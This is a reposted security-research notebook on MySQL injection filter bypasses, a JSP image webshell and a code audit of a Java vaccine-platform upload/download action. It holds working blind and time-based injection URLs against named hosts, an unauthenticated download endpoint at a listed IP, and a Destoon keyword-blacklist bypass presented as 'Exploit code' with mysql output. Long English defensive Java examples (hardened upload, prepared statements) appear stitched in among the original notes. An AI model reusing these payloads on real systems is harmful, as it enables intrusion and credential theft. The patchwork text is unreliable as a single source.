20160315
Published: 2019-05-22

MySQL injection:
    the secret of the backslash \
    the secret of bypassing with select from, char, and substitutes for the where keyword
    the secret of multi-stage filtering: second- and third-order injection; update to overwrite the administrator
JSP image webshell:
    a download is in Baidu Netdisk on drive F
    there is also a folder on the desktop
    
Java && .NET code audit review:
    http://www.wooyun.org/bugs/wooyun-2014-053099  the big problem with 302 redirects; Xiao He's JSP did not leak that information.

    http://58.214.247.138:8888/vacc/document/downdoc.do?docu_id=2
    downloaddocument has no SESSION check

    http://www.wooyun.org/bugs/wooyun-2010-061078
    ' or[column name]<db_name()--  // keyword bypass

    [.NET primer, part 1] where the database information lives
    http://drops.wooyun.org/tips/975
    http://blog.163.com/hero_213/blog/static/3989121420085267561179/
    mapping.findForward -> the "fail" forward is looked up in struts-config.
        HttpSession session = request.getSession();
        String userid = (String)session.getAttribute("usersplatformuserid");
        String name = new String(request.getParameter("name").getBytes("iso-8859-1"), "gb2312");
        if ((name == null) || ("".equals(name))) {
          return mapping.findForward("fail");
        }

    nopted++; file search: search the whole directory for class xxx
    or for: public ServiceResponse
    private ServiceResponse
    public class ServiceResponse
Search for upload
This is the upload one:
import com.jwx.jfa.dto.ServiceRequest;
import com.jwx.jfa.dto.ServiceResponse;
import com.jwx.jfa.dto.ServiceResponse.ServiceCode;
import com.jwx.jfa.web.BaseAction;
import com.jwx.nipm.vaccine.dto.DocumentDTO;
import com.jwx.nipm.vaccine.util.VaccineIdentity;
import java.io.File;
import java.io.FileOutputStream;
import java.util.Iterator;
import java.util.List;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.HttpSession;
import org.apache.commons.fileupload.DiskFileUpload;
import org.apache.commons.fileupload.FileItem;
import org.apache.struts.action.ActionForm;
import org.apache.struts.action.ActionForward;
import org.apache.struts.action.ActionMapping;
This is the download one:
import com.jwx.jfa.dto.ServiceRequest;
import com.jwx.jfa.dto.ServiceResponse;
import com.jwx.jfa.dto.ServiceResponse.ServiceCode;
import com.jwx.jfa.log.JfaLogger;
import com.jwx.jfa.web.BaseAction;
import com.jwx.nipm.vaccine.dto.DocumentDTO;
import com.jwx.nipm.vaccine.util.DateUtil;
import com.jwx.nipm.vaccine.util.VaccineIdentity;
import java.io.File;
import java.io.FileInputStream;
import java.util.Map;
import javax.servlet.ServletOutputStream;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import org.apache.commons.logging.Log;
import org.apache.struts.action.ActionForm;
import org.apache.struts.action.ActionForward;
import org.apache.struts.action.ActionMapping;
Upload in the Linux environment:
package com.jwx.nipm.vaccine.web.document;
import com.jwx.jfa.dto.ServiceRequest;
import com.jwx.jfa.dto.ServiceResponse;
import com.jwx.jfa.dto.ServiceResponse.ServiceCode;
import com.jwx.jfa.web.BaseAction;
import com.jwx.nipm.vaccine.dto.DocumentDTO;
import com.jwx.nipm.vaccine.util.VaccineIdentity;
import java.io.File;
import java.io.FileOutputStream;
import java.util.Iterator;
import java.util.List;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.HttpSession;
import org.apache.commons.fileupload.DiskFileUpload;
import org.apache.commons.fileupload.FileItem;
import org.apache.struts.action.ActionForm;
import org.apache.struts.action.ActionForward;
import org.apache.struts.action.ActionMapping;
public class UploadDocumentAction extends BaseAction
{
  public ActionForward execute(ActionMapping mapping, ActionForm form, HttpServletRequest request, HttpServletResponse response)
    throws Exception
  {
    try
    {
      ServiceRequest serviceRequest = generateRequest(request);
      serviceRequest.setIdentity(new VaccineIdentity());
      serviceRequest.setRequestedCommandID("documentCommand");
      serviceRequest.setParameter("action", "upload"); // action=upload, like this?
      HttpSession session = request.getSession();
      String userid = (String)session.getAttribute("usersplatformuserid"); // read usersplatformuserid from the session
      String name = new String(request.getParameter("name").getBytes("iso-8859-1"), "gb2312"); // read the name parameter
      if ((name == null) || ("".equals(name))) {
        return mapping.findForward("fail");
      }
      String fileStore = "document\\";
      File store = new File(fileStore);
      if (!store.exists()) store.mkdir();
      DiskFileUpload fu = new DiskFileUpload();
      fu.setSizeThreshold(1073741824);
      List fileItems = fu.parseRequest(request); // parse the multipart values sent in the request
      Iterator it = fileItems.iterator();
      String fileName = null;
      long fileSize = 0L;
      byte[] content = null;
      while (it.hasNext()) {
        FileItem fi = (FileItem)it.next();
        String field;
        if (fi.isFormField()) {
          field = fi.getFieldName().toUpperCase(); // upper-case the form field name
        }
        else {
          fileName = fi.getName(); // client-supplied file name
          fileSize = fi.getSize(); // file size
          if (fileSize > 1048576L)
            return mapping.findForward("fail");
          content = fi.get();
        }
      }
      if ((fileName == null) || (fileName.trim().equals(""))) throw new Exception("No file be selected!");
      fileName = fileName.substring(fileName.lastIndexOf('\\'));
      FileOutputStream os = new FileOutputStream(fileStore + File.separator + fileName, false); // File.separator is '/' on UNIX and '\' on Microsoft Windows
      os.write(content);
      os.close();
      DocumentDTO document = new DocumentDTO();
      document.setDocu_adder(Integer.valueOf(userid));
      document.setDocu_title(fileName.substring(fileName.lastIndexOf('\\') + 1));
      document.setDocu_size(Integer.toString((int)Math.floor((fileSize + 1023L) / 1024L)));
      serviceRequest.setCurrentRequestObject(document);
      ServiceResponse serviceResponse = processRequest(serviceRequest);
      if (serviceResponse.getServiceCode() == ServiceResponse.ServiceCode.SUCCESS) {
        return mapping.findForward("success");
      }
      return mapping.findForward("fail");
    }
    catch (Exception e)
    {
      e.printStackTrace();
    }
    return mapping.findForward("fail");
  }
}
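The upload action above takes the file name from the client, strips only a backslash prefix, applies no extension allow-list, and writes into a relative "document" directory, which is exactly what makes a JSP image webshell worth uploading. The helper below is an added example, not code from the audited application: it shows the checks a hardened version would perform. The class name SafeDocumentUpload, the storage root, the extension allow-list and the 1 MiB limit (kept from the original code) are assumptions; the caller is assumed to have already rejected requests with no authenticated user in the session.

```java
import java.io.IOException;
import java.io.InputStream;
import java.nio.file.Files;
import java.nio.file.Path;
import java.util.Locale;
import java.util.Set;
import java.util.UUID;

/**
 * Added example (hypothetical helper, not part of the audited application):
 * validates a client-supplied multipart file name and stores the bytes under a
 * server-generated name, outside the web root.
 */
public final class SafeDocumentUpload {

    // Only the document types the application needs. Executable content such as
    // .jsp is refused because it is absent from this list, not because a
    // blacklist recognised it (assumed list).
    private static final Set<String> ALLOWED_EXTENSIONS =
            Set.of("pdf", "doc", "docx", "xls", "xlsx", "txt");

    // Same 1 MiB limit the original action used.
    private static final long MAX_BYTES = 1_048_576L;

    // Storage root that the servlet container does not serve (assumed path).
    private final Path storeRoot;

    public SafeDocumentUpload(Path storeRoot) {
        this.storeRoot = storeRoot.toAbsolutePath().normalize();
    }

    /** Final path component only, whichever separator the browser sent. */
    static String baseName(String clientFileName) {
        if (clientFileName == null) return "";
        String name = clientFileName.replace('\\', '/');
        return name.substring(name.lastIndexOf('/') + 1).trim();
    }

    /** Lower-cased extension after the last dot, or "" when there is none. */
    static String extensionOf(String baseName) {
        int dot = baseName.lastIndexOf('.');
        if (dot < 0 || dot == baseName.length() - 1) return "";
        return baseName.substring(dot + 1).toLowerCase(Locale.ROOT);
    }

    /** Rejects bad names and sizes; returns the extension that will be kept. */
    static String validate(String clientFileName, long declaredSize) {
        String base = baseName(clientFileName);
        if (base.isEmpty() || base.equals(".") || base.equals("..") || base.indexOf('\0') >= 0) {
            throw new IllegalArgumentException("Invalid or missing file name");
        }
        String ext = extensionOf(base);
        if (!ALLOWED_EXTENSIONS.contains(ext)) {
            throw new IllegalArgumentException("File type not allowed: " + ext);
        }
        if (declaredSize <= 0 || declaredSize > MAX_BYTES) {
            throw new IllegalArgumentException("File empty or too large");
        }
        return ext;
    }

    /**
     * Stores the upload as <random UUID>.<ext>. The client name is used only for
     * the extension check; keep it as display metadata if the UI needs it.
     */
    public Path store(String clientFileName, long declaredSize, InputStream in) throws IOException {
        String ext = validate(clientFileName, declaredSize);
        Files.createDirectories(storeRoot);
        Path target = storeRoot.resolve(UUID.randomUUID() + "." + ext).normalize();
        if (!target.startsWith(storeRoot)) {
            throw new IOException("Target escaped the storage root");
        }
        // Read at most MAX_BYTES + 1 so a misreported size cannot fill the disk.
        byte[] data = in.readNBytes((int) MAX_BYTES + 1);
        if (data.length > MAX_BYTES) {
            throw new IOException("File exceeds size limit");
        }
        Files.write(target, data);
        return target;
    }
}
```

In the Struts action this replaces the substring/FileOutputStream lines: after checking that usersplatformuserid is present in the session, call store(fi.getName(), fi.getSize(), fi.getInputStream()) and record the returned path in the DocumentDTO. Because the stored name is generated by the server and the directory is not served, even a file that passes the extension check can never be requested as a script.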
MySQL syntax:
    select-1;
    select+1;
    select{x 1};
    select.`1`.a;
    select.``.schema_name from information_schema.schemata;
    http://rile.gou.gg/search?query=1%27>(select.``.schema_name from (select.``.schema_name,if(ascii(mid((select * from test.flag),1,1))=102,(benchmark(5000000,sha(1))),1) from information_schema.schemata)x)%23
    http://rile.gou.gg/search?query=1' || if(ascii(substr((/*!select*/ */*a!*/from test.flag),1,1))=97,1,0)%23
    http://rile.gou.gg/search?query=1' || if(ascii(substr((/*!select*/ */*a!*/from test.flag),1,1))=97,1,1)%23
    select * from corp where corp_id in (1,2,(if(1=1,3,2))) group by concat(version(),floor(rand(0)*2)) having min(0);
    So we can use the form corp_id=1 and corp_name='xxxx' to recover the value of corp_name in the end.
    In principle the same form, uname='admin' and upass='xxx', would recover the value of pass,
    but here the pass field has to be brute-forced with a dictionary.
    http://zone.wooyun.org/content/23796
    multipart/form-data: a WAF bypass method that works for both PHP and Java
    http://zone.wooyun.org/content/24143
    /*select*/SELECT`password`from `destoon_member`
    /*select*/SELECT`password`from `destoon_member` GROUP BY userid HAVING userid = 1
    GROUP BY + HAVING can help us pinpoint a row.
### Bypass tricks for character-by-character guessing
The program filters many of the functions needed to guess a string, e.g. substring/substr/left..., but it seems to have forgotten right and mid?
Code:
sql = mid( (/*selec*/SELECT`password`from `destoon_member` GROUP BY userid HAVING userid = 1) , 1, 1 )
Once a character has been found, it has to be converted. Here the program filters ascii, hex, ord and char, but what about CONV?
Code:
CONV(mid( (/*selec*/SELECT`password`from `destoon_member` GROUP BY userid HAVING userid = 1) , 1, 1 ),16,10)=16
Trick one: select.``.password from destoon_member
Trick two: select!1,password from destoon_member
    mysql> SELECT LPAD(REVERSE(TRIM( lpad('username',3,SPACE(1)) )),1,SPACE(1));
    +---------------------------------------------------------------+
    | LPAD(REVERSE(TRIM( lpad('username',3,SPACE(1)) )),1,SPACE(1)) |
    +---------------------------------------------------------------+
    | e                                                             |
    +---------------------------------------------------------------+
    1 row in set

    mysql> SELECT MID('username',3,1);
    +---------------------+
    | MID('username',3,1) |
    +---------------------+
    | e                   |
    +---------------------+
    1 row in set

    mysql>
After splitting the string out, we try to convert it to decimal. conv still works with a comment inserted between it and the parenthesis.
Code:
    mysql> select conv/**/('ad',16,10);
    +----------------------+
    | conv/**/('ad',16,10) |
    +----------------------+
    | 173                  |
    +----------------------+
    1 row in set
## Exploit code
Guessing the username in destoon_member.
Code:
(/*select*/SELECT!1,conv/**/(LPAD(REVERSE(TRIM( lpad(username,1,SPACE(1)) )),1,SPACE(1)),16,10)/*from*/from `destoon_member` ORDER BY userid limit 1)=(SELECT 0,13)
This is the statement after the filter has rewritten it; it still executes:
Code:
(/*selec&#116;*/SELECT!1,conv/**/(LPAD(REVERSE(TRIM( lpad(username,1,SPACE(1)) )),1,SPACE(1)),16,10)/*fro&#109;*/from `destoon_member` ORDER BY userid limit 1)=(SELECT!1,223)
Proof of vulnerability:
The original statement we submitted:
Code:
(/*select*/SELECT!1,conv/**/(LPAD(REVERSE(TRIM( lpad(username,1,SPACE(1)) )),1,SPACE(1)),16,10)/*from*/from `destoon_member` ORDER BY userid limit 1)=(SELECT!1,223)
The statement after filtering:
Code:
(/*selec&#116;*/SELECT!1,conv/**/(LPAD(REVERSE(TRIM( lpad(username,1,SPACE(1)) )),1,SPACE(1)),16,10)/*fro&#109;*/from `destoon_member` ORDER BY userid limit 1)=(SELECT!1,223)
Below, a test of whether the SQL statement is executable:
Code:
    mysql> select (/*selec&#116;*/SELECT!1,conv/**/(LPAD(REVERSE(TRIM( lpad(username,1,SPACE(1)) )),1,SPACE(1)),16,10)/*fro&#109;*/from `destoon_member` ORDER BY userid limit 1)=(SELECT!1,223);
    +--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
    | (/*selec&#116;*/SELECT!1,conv/**/(LPAD(REVERSE(TRIM( lpad(username,1,SPACE(1)) )),1,SPACE(1)),16,10)/*fro&#109;*/from `destoon_member` ORDER BY userid limit 1)=(SELECT!1,223) |
    +--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
    |                                                                                                                                                                            0 |
    +--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
    1 row in set

    mysql> select (/*selec&#116;*/SELECT!1,conv/**/(LPAD(REVERSE(TRIM( lpad(username,1,SPACE(1)) )),1,SPACE(1)),16,10)/*fro&#109;*/from `destoon_member` ORDER BY userid limit 1)=(SELECT!1,13);
    +-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
    | (/*selec&#116;*/SELECT!1,conv/**/(LPAD(REVERSE(TRIM( lpad(username,1,SPACE(1)) )),1,SPACE(1)),16,10)/*fro&#109;*/from `destoon_member` ORDER BY userid limit 1)=(SELECT!1,13) |
    +-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
    |                                                                                                                                                                           1 |
    +-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
    1 row in set
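Every trick in the Destoon section above works against the same weakness: the application concatenates user input into SQL text and then tries to recognise dangerous keywords in that text, so each function or spelling the blacklist misses becomes a new bypass. The same applies to the corp_id / uname-and-upass queries earlier in these notes. The repository class below is an added example, not code from Destoon or from the audited vaccine application; it shows the fix that makes the blacklist irrelevant: bind every user-controlled value as a parameter, and allow-list the one thing a placeholder cannot express, an identifier in ORDER BY. Table and column names (destoon_member, username, password, userid, corp, corp_id, corp_name) are taken from the queries in these notes; the class name MemberRepository is an assumption.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.util.ArrayList;
import java.util.List;
import java.util.Optional;
import java.util.Set;

/**
 * Added example (hypothetical class; not Destoon's or the audited app's code).
 * Every user-controlled value is bound with a setXxx() call, so the server
 * receives the statement text and the data separately: comments, backticks,
 * the !-trick or conv/**​/ in the data are just characters in a string.
 */
public final class MemberRepository {

    // Identifiers cannot be bound as parameters, so the user may only choose
    // among columns fixed here; anything else is refused before any SQL is built.
    private static final Set<String> SORTABLE_COLUMNS = Set.of("userid", "username");

    private final Connection conn;

    public MemberRepository(Connection conn) {
        this.conn = conn;
    }

    /** Stored password hash for one member; replaces the uname='admin' and upass='xxx' style of query. */
    public Optional<String> passwordHashFor(String username) throws SQLException {
        String sql = "SELECT password FROM destoon_member WHERE username = ?";
        try (PreparedStatement ps = conn.prepareStatement(sql)) {
            ps.setString(1, username); // a value such as ' or 1=1-- is compared literally, never parsed
            try (ResultSet rs = ps.executeQuery()) {
                return rs.next() ? Optional.ofNullable(rs.getString(1)) : Optional.empty();
            }
        }
    }

    /** corp_name for one corp_id; binding an int leaves no room for the IN(...) GROUP BY payload. */
    public Optional<String> corpName(int corpId) throws SQLException {
        String sql = "SELECT corp_name FROM corp WHERE corp_id = ?";
        try (PreparedStatement ps = conn.prepareStatement(sql)) {
            ps.setInt(1, corpId);
            try (ResultSet rs = ps.executeQuery()) {
                return rs.next() ? Optional.ofNullable(rs.getString(1)) : Optional.empty();
            }
        }
    }

    /** ORDER BY needs an identifier, so the column is allow-listed and only LIMIT is a bound value. */
    public List<String> usernamesOrderedBy(String column, int limit) throws SQLException {
        if (!SORTABLE_COLUMNS.contains(column)) {
            throw new IllegalArgumentException("unsupported sort column");
        }
        String sql = "SELECT username FROM destoon_member ORDER BY " + column + " LIMIT ?";
        List<String> out = new ArrayList<>();
        try (PreparedStatement ps = conn.prepareStatement(sql)) {
            ps.setInt(1, Math.max(1, Math.min(limit, 100))); // clamp so a client cannot request the whole table
            try (ResultSet rs = ps.executeQuery()) {
                while (rs.next()) {
                    out.add(rs.getString(1));
                }
            }
        }
        return out;
    }
}
```

The login path then compares the submitted password against the returned hash in application code rather than in the WHERE clause, which also removes the second-order variant the notes mention: a value stored from one bound query is read back as data and never re-enters SQL text.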
   

Repost source: http://rdmnn.baihongyu.com/
